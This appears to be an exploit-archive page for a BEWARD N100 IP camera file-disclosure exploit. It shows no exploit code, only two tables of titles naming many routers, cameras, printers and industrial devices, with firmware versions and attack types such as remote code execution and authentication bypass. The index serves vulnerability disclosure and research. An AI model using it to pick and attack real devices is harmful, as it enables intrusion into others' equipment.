"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure"

Author: LiquidWorm

Platform: hardware

Release date: 2019-02-05

Release Date Title Type Platform Author
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
2019-01-14 "Lenovo R2105 - Cross-Site Request Forgery (Command Execution)" webapps hardware "Nathu Nandwani"
2019-01-14 "Across DR-810 ROM-0 - Backup File Disclosure" webapps hardware SajjadBnd
2019-01-14 "Hootoo HT-05 - Remote Code Execution (Metasploit)" remote hardware "Andrei Manole"
2019-01-09 "ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting" webapps hardware "Nathu Nandwani"
2019-01-09 "Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)" webapps hardware SajjadBnd
2019-01-07 "Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)" webapps hardware "Nathu Nandwani"
2018-12-14 "Huawei Router HG532e - Command Execution" webapps hardware Rebellion
2018-12-14 "Cisco RV110W - Password Disclosure / Command Execution" remote hardware RySh
2018-12-11 "ZTE ZXHN H168N - Improper Access Restrictions" webapps hardware "Usman Saeed"
2018-12-11 "Huawei B315s-22 - Information Leak" webapps hardware "Usman Saeed"
2018-12-11 "TP-Link wireless router Archer C1200 - Cross-Site Scripting" webapps hardware "Usman Saeed"
2018-12-04 "NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage" webapps hardware hyp3rlinx
2018-12-04 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass" webapps hardware Luca.Chiou
2018-12-03 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting" webapps hardware Luca.Chiou
2018-11-30 "Schneider Electric PLC - Session Calculation Authentication Bypass" webapps hardware Photubias
2018-11-26 "Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal" webapps hardware "numan türle"
2018-11-26 "Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials" webapps hardware Hodorsec
2018-11-27 "Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)" remote hardware Metasploit
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-12 "D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery" webapps hardware hyp3rlinx
2018-11-12 "TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)" webapps hardware Wadeek
2018-11-05 "Virgin Media Hub 3.0 Router - Denial of Service (PoC)" webapps hardware "Ross Inman"
2018-11-02 "Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel" local hardware "Billy Brumley"
2018-10-30 "NETGEAR WiFi Router R6120 - Credential Disclosure" webapps hardware Wadeek
2018-10-12 "D-Link Routers - Directory Traversal" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Plaintext Password" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Command Injection" webapps hardware "Blazej Adamczyk"
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-16 "Heatmiser Wifi Thermostat 1.7 - Credential Disclosure" webapps hardware d0wnp0ur
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-11 "Phoenix Contact WebVisit 6.40.00 - Password Disclosure" webapps hardware Photubias
2018-10-11 "WAGO 750-881 01.09.18 - Cross-Site Scripting" webapps hardware SecuNinja
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-05 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-10-03 "RICOH MP C1803 JPN Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-03 "Airties AIR5342 1.0.0.18 - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-01 "Billion ADSL Router 400G 20151105641 - Cross-Site Scripting" webapps hardware cakes
2018-09-25 "RICOH MP C406Z Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP 305+ Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C6503 Plus Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C2003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH MP C6003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH Aficio MP 301 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "LG SuperSign EZ CMS 2.5 - Remote Code Execution" webapps hardware "Alejandro Fanjul"
2018-09-21 "Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection" webapps hardware "Simon Brannstrom"
2018-09-19 "LG SuperSign EZ CMS 2.5 - Local File Inclusion" webapps hardware "Alejandro Fanjul"
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting" webapps hardware cakes
2018-09-12 "LG Smart IP Camera 1508190 - Backup File Download" webapps hardware "Ege Balci"
2018-09-12 "CirCarLife SCADA 4.3.0 - Credential Disclosure" webapps hardware SadFud
2018-09-10 "LW-N605R 12.20.2.1486 - Remote Code Execution" webapps hardware "Nassim Asrir"
2018-09-07 "QNAP Photo Station 5.7.0 - Cross-Site Scripting" webapps hardware "Mitsuaki Shiraishi"
2018-09-06 "D-Link Dir-600M N150 - Cross-Site Scripting" webapps hardware "PUNIT DARJI"
2018-08-31 "Vox TG790 ADSL Router - Cross-Site Scripting" webapps hardware cakes
2018-08-30 "DLink DIR-601 - Credential Disclosure" webapps hardware "Kevin Randall"
2018-08-29 "Episerver 7 patch 4 - XML External Entity Injection" webapps hardware "Jonas Lejon"
2018-08-27 "Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection" webapps hardware "Yorick Koster"
2018-08-27 "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)" webapps hardware "Ismail Tasdelen"
2018-08-24 "Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-08-22 "Geutebrueck re_porter 16 - Cross-Site Scripting" webapps hardware "Kamil Suska"
2018-08-22 "ZyXEL VMG3312-B10B - Cross-Site Scripting" webapps hardware "Samet ŞAHİN"
2018-08-21 "Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)" webapps hardware Alfie
2018-08-17 "ADM 3.1.2RHG1 - Remote Code Execution" webapps hardware "Matthew Fulton"
2018-08-15 "ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass" webapps hardware AmnBAN
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)" webapps hardware Wadeek
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)" webapps hardware Wadeek
2018-08-22 "Geutebrueck re_porter 7.8.974.20 - Credential Disclosure" webapps hardware "Kamil Suska"
2018-08-02 "ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution" webapps hardware "Fakhri Zulkifli"
2018-07-31 "LG NAS 3718.510.a0 - Remote Command Execution" webapps hardware 0x616163
2018-09-06 "WirelessHART Fieldgate SWG70 3.0 - Directory Traversal" webapps hardware "Hamit CİBO"
2018-07-26 "Trivum Multiroom Setup Tool 8.76 - Cross-Site Request Forgery (Admin Bypass)" webapps hardware vulnc0d3
2018-07-24 "D-link DAP-1360 - Path Traversal / Cross-Site Scripting" webapps hardware r3m0t3nu11
2018-08-17 "Mikrotik WinBox 6.42 - Credential Disclosure (golang)" webapps hardware "Maxim Yefimenko"
2018-07-23 "Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)" webapps hardware "Nathu Nandwani"
2018-07-23 "Davolink DVW 3200 Router - Password Disclosure" webapps hardware "Ankit Anubhav"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-20 "Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass" webapps hardware vulnc0d3
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-07-13 "Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery" webapps hardware t4rkd3vilz
2018-07-13 "Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload" webapps hardware "Safak Aslan"
2018-07-13 "QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities" webapps hardware "Core Security"
2018-07-16 "VelotiSmart WiFi B-380 Camera - Directory Traversal" webapps hardware "Miguel Mendez Z"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-10 "D-Link DIR601 2.02 - Credential Disclosure" webapps hardware "Thomas Zuk"
2018-07-02 "VMware NSX SD-WAN Edge < 3.1.2 - Command Injection" webapps hardware ParagonSec
2018-07-02 "Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)" webapps hardware RandoriSec
2018-06-28 "Cisco Adaptive Security Appliance - Path Traversal" webapps hardware "Yassine Aboukir"
2018-06-28 "DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Arbitrary File Upload" webapps hardware "Samrat Das"
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)" webapps hardware Wadeek
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "DIGISOL DG-BR4000NG - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Cross-Site Request Forgery (Add Admin)" webapps hardware "Samrat Das"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-06-20 "TP-Link TL-WA850RE - Remote Command Execution" webapps hardware yoresongo
2018-06-11 "Siaberry 1.2.2 - Command Injection" webapps hardware "Space Duck"
2018-06-08 "XiongMai uc-httpd 1.0.0 - Buffer Overflow" webapps hardware "Andrew Watson"
2018-06-04 "Brother HL Series Printers 1.15 - Cross-Site Scripting" webapps hardware "Huy Kha"
2018-05-31 "TAC Xenta 511/911 - Directory Traversal" webapps hardware "Marek Cybul"
2018-05-29 "NUUO NVRmini2 / NVRsolo - Arbitrary File Upload" webapps hardware M3@Pandas
2018-05-28 "TP-Link TL-WR840N/TL-WR841N - Authentication Bypass" webapps hardware "BlackFog Team"
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-09-05 "Tenda ADSL Router D152 - Cross-Site Scripting" webapps hardware "Sandip Dey"
2018-05-23 "SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change" webapps hardware "Safak Aslan"
2018-05-22 "Nordex N149/4.0-4.5 - SQL Injection" webapps hardware t4rkd3vilz
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-20 "D-Link DSL-3782 - Authentication Bypass" webapps hardware "Giulio Comi"
2018-05-18 "Cisco SA520W Security Appliance - Path Traversal" webapps hardware "Nassim Asrir"
2018-05-17 "Intelbras NCLOUD 300 1.0 - Authentication bypass" webapps hardware "Pedro Aguiar"
2018-05-10 "Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery" webapps hardware "Raffaele Sabato"
2018-03-27 "DLINK DCS-5020L - Remote Code Execution (PoC)" webapps hardware "Fidus InfoSecurity"
2018-04-26 "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot" webapps hardware Wadeek
2018-04-18 "Lutron Quantum 2.0 - 3.2.243 - Information Disclosure" webapps hardware SadFud
2018-04-06 "FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass" webapps hardware "Noman Riffat"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-04-02 "DLink DIR-601 - Admin Password Disclosure" webapps hardware "Kevin Randall"
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials" webapps hardware LiquidWorm
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-23 "TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery" webapps hardware "Mans van Someren"
2018-03-20 "Coship RT3052 Wireless Router - Persistent Cross-Site Scripting" webapps hardware "Sayan Chatterjee"
2018-03-20 "Intelbras Telefone IP TIP200 LITE - Local File Disclosure" webapps hardware anhax0r
2018-03-16 "Contec Smart Home 4.15 - Unauthorized Password Reset" webapps hardware Z3ro0ne
2018-03-02 "D-Link DIR-600M Wireless - Cross-Site Scripting" webapps hardware "Prasenjit Kanti Paul"
2017-11-27 "ZTE ZXDSL 831CII - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-11-17 "Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting" webapps hardware "Keith Thome"
2017-10-17 "TP-Link WR940N - (Authenticated) Remote Code" webapps hardware "Fidus InfoSecurity"
2017-10-12 "TP-Link TL-MR3220 - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-10-12 "Dreambox Plugin BouquetEditor - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-09-27 "NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution" webapps hardware "Kacper Szurek"
2017-10-03 "Fiberhome AN5506-04-F - Command Injection" webapps hardware Tauco
2017-10-02 "NPM-V (Network Power Manager) 2.4.1 - Password Reset" webapps hardware "Saeed reza Zamanian"
2017-09-24 "HBGK DVR 3.0.0 build20161206 - Authentication Bypass" webapps hardware "RAT - ThiefKing"
2017-09-28 "Roteador Wireless Intelbras WRN150 - Authentication Bypass" webapps hardware "Elber Tavares"
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Stream Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera FC-S/PT - Command Injection" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Information Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution" webapps hardware LiquidWorm
2017-09-18 "iBall ADSL2+ Home Router - Authentication Bypass" webapps hardware "Gem George"
2017-09-15 "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass" webapps hardware "Gem George"
2017-09-14 "Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass" webapps hardware Kivson
2017-09-12 "D-Link DIR-8xx Routers - Local Firmware Upload" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Root Remote Code Execution" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Leak Credentials" webapps hardware embedi
2017-09-11 "WiseGiga NAS - Multiple Vulnerabilities" webapps hardware "Pierre Kim"
2017-09-05 "FiberHome ADSL AN1020-25 - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-09-07 "Huawei HG255s - Directory Traversal" webapps hardware "Ahmet Mersin"
2017-09-07 "Roteador Wireless Intelbras WRN150 - Cross-Site Scripting" webapps hardware "Elber Tavares"
2017-09-04 "Wireless Repeater BE126 - Remote Code Execution" webapps hardware "Hay Mizrachi"
2017-08-29 "Brickcom IP Camera - Credentials Disclosure" webapps hardware "Emiliano Ipar"
2017-08-29 "D-Link DIR-600 - Authentication Bypass" webapps hardware "Jithin D Kurup"
2017-08-12 "AirMaster 3000M - Multiple Vulnerabilities" webapps hardware "Mr.8Th BiT"
2017-08-12 "RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)" webapps hardware "Touhid M.Shaikh"
2017-08-08 "Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution" webapps hardware "Kacper Szurek"
2017-08-03 "Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting" webapps hardware "Geolado giolado"
2017-08-01 "SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection" webapps hardware "Andy Tan"
2017-07-28 "FortiOS < 5.6.0 - Cross-Site Scripting" webapps hardware patryk_bogdan
2017-07-20 "VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass" webapps hardware Viktoras
2017-07-18 "Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)" webapps hardware xort
2017-07-14 "WDTV Live SMP 2.03.20 - Remote Password Reset" webapps hardware Sw1tCh
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass" webapps hardware LiquidWorm
2017-07-11 "DataTaker DT80 dEX 1.50.012 - Information Disclosure" webapps hardware "Nassim Asrir"
2017-07-10 "Pelco Sarix/Spectra Cameras - Remote Code Execution" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting" webapps hardware LiquidWorm
2017-07-03 "OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution" webapps hardware "Jonatas Fil"
2017-06-30 "Humax HG100R 2.0.6 - Backup File Download" webapps hardware gambler
Release Date Title Type Platform Author
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps linux LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-04-09 "KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)" webapps linux LiquidWorm
2018-04-09 "KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection" webapps xml LiquidWorm
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials" webapps hardware LiquidWorm
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal" webapps perl LiquidWorm
2018-03-12 "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials" webapps multiple LiquidWorm
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Stream Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera FC-S/PT - Command Injection" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Information Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution" webapps hardware LiquidWorm
2017-08-28 "NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)" webapps json LiquidWorm
2017-08-28 "NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting" webapps json LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-22 "Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write" webapps java LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass" webapps hardware LiquidWorm
2017-07-10 "Pelco VideoXpert 1.12.105 - Information Disclosure" webapps windows LiquidWorm
2017-07-10 "Pelco VideoXpert 1.12.105 - Directory Traversal" webapps windows LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Remote Code Execution" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting" webapps hardware LiquidWorm
2017-06-04 "EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution" webapps hardware LiquidWorm
2017-05-31 "OV3 Online Administration 3.0 - SQL Injection" webapps php LiquidWorm
2017-05-31 "OV3 Online Administration 3.0 - Remote Code Execution" webapps php LiquidWorm
2017-05-31 "OV3 Online Administration 3.0 - Directory Traversal" webapps php LiquidWorm
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution" webapps windows LiquidWorm
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change" webapps java LiquidWorm
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure" webapps java LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - Directory Traversal" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - Password Reset" webapps multiple LiquidWorm
2017-04-30 "Emby MediaServer 3.2.5 - SQL Injection" webapps multiple LiquidWorm
2017-08-22 "Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - User Enumeration" webapps java LiquidWorm
2018-02-12 "LogicalDOC Enterprise 7.7.4 - Directory Traversal" webapps java LiquidWorm
